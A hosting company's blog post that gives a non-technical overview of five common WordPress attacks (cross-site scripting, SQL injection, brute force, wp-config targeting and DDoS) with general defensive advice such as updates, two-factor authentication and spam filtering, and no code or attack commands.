5 Common WordPress Attacks and How to Stop Them

5 Common WordPress Attacks and How to Stop Them

WordPress websites

When it comes to cybersecurity, WordPress is a victim of its own success. Used on 35% of the world’s websites, its popularity makes it highly attractive to cybercriminals. While no less secure than other platforms, the sheer volume of WordPress websites means, statistically, there’s more chance of an attack. To help you to protect your site, here are five common forms of WordPress attack and advice on how to defend against them.

1. Cross-site scripting attacks

Also known as an XSS attack, cross-site scripting takes advantage of vulnerabilities in the parts of your website where users input data, such comments. Here, cybercriminals will input a link to malware hosted on another server, enabling it to be injected into the script that runs your website. Once the script becomes infected, the attacker can take control of your site, stealing login information, user data or even installing other malware, such as ransomware.

The starting point in defending your site against XSS attacks is to minimise the opportunities for inputting malicious links. If you don’t need comments on your website, disable them. If you do, make sure you activate the Askimet plugin that comes preinstalled with your WordPress site. This will automatically remove the vast majority of spam comments that contain XXS links. WordPress v5.1.1 added a number of built-in XXS defences to the WordPress core, so make sure you have updated to this version or higher.   

2. SQL injection

SQL is a computer language that is used to run your database and other elements of your website. An SQL injection is a form of attack that exploits vulnerabilities in WordPress by inputting malicious SQL code into login fields and sending it to the server. Once inputted, the code enables a hacker to take control of the website. A common tactic is to create a new admin user and delete existing ones, effectively blocking you from your own website. With admin access, the hacker can then use the site for their own purposes and steal all the user data in the database.

The main vulnerability for SQL injection comes from themes and plugins which aren’t designed to defend against it. Those available from within the WordPress repository should generally be regarded as safe, provided they are still regularly updated and are compatible with the latest WordPress versions. The biggest issues are with third-party plugins which aren’t obliged to go through the same level as scrutiny as those in the repository. If you use third-party themes and plugins, make sure they are from a reputable developer.

3. Brute force attacks

A brute force attack is where a cybercriminal attempts to gain access to the backend of your website by logging in as an administrator. To do this, they will try to figure out your username and password.  While this may seem a difficult task to do, don’t make the mistake of thinking that it’s someone sat at a computer screen repeatedly typing in guesses on your wp-admin page. Rather, today’s hackers deploy sophisticated brute force attack applications to help them achieve their goals.

With software that analyses huge datasets of stolen login credentials and then applies AI and machine learning, the chances of getting the login details right are much improved. While this may still leave the attacker needing to make several thousand separate guesses, the process is automated and carried out by machine. What’s more, by using a VPN to change their IP address every time they attempt a login, the hacker evades being blocked by a firewall for making repeated failed login attempts.

There are many ways to make things more difficult for the hacker, such as having random usernames and strong passwords, adding captcha to the login process and even changing the address of the wp-admin page. However, the best way to protect your website against brute force attacks is to use two-factor authentication. That way, even if the hacker correctly guesses the login credentials, they will need your phone to access the randomly generated, time-limited user key needed for access.

4. Wp-config attacks

The WordPress file wp-config.php is the key configuration file in your website’s software and one which attackers find exceptionally useful to get to; doing so gives them access to lots of information about your site, including user logins. For this reason, it’s a common target of attack.

As plugins require access to the wp-config.php file, attackers will look for vulnerabilities within plugins as a means to gain access to it. Enabling automatic updates will ensure all vulnerabilities are fixed as soon as a patch is released and minimise the risk of the file being accessed. You can also try to outwit some hackers by moving the file to a different location than the default root directory.

5. DDoS attacks

DDoS or distributed denial of service attacks are where servers are bombarded with so many requests that they are unable to cope and crash. They are famously used by state-sponsored hackers or major hacking groups to take down the servers of large corporations, public utilities, governments and the military. They can, however, be used on any website. If you suffer a DDoS attack, rather than wanting to gain access to your site and steal your data, the hacker simply wants to disrupt your services by taking them offline, perhaps with the intention of ransoming you or causing damage to your business. 

DDoS attacks work by flooding your servers with requests. This is often achieved by hackers purchasing a DDoS attack from a sophisticated criminal gang on the dark web. That gang will have used malware infections to take control of huge numbers of computers around the world and will instruct them all to visit your site at the same time and to keep doing so. Even internet giant Amazon Web Services struggled to withstand a recent attack that sent 2.3 terabytes a second to its servers.

For most WordPress users, defending against DDoS attacks is the responsibility of their web host which will manage the server on their behalf. However, for those which manage their own servers, it is vital to monitor web traffic and block suspicious IPs that may be making too many requests, especially if these are based in locations from where you do not normally receive traffic.


All websites, regardless of whether they are built with WordPress or not, are vulnerable to cyberattacks. The five attacks mentioned above are some of the major ones affecting WordPress, though they can also be used against other types of platform. Hopefully, the advice given here will show you how to defend against them.

For hosting with built-in security, visit our homepage.


Pin It on Pinterest

Share This